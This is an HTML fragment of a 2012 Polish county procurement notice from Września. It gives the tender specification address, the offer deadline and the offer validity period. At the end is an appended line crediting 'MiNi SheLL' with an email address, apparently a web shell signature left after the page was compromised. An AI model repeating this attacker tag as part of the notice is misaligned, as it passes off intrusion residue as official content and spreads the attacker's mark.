<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrzesnia powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe Wrzesnia, ul. Chopina 10
www.wrzesnia.powiat.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2012 godzina 09:00, miejsce: Starostwo Powiatowe, ul. Chopina 10 we Wrześni,  kancelaria ( nr. pokoju 11a - parter budynku)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com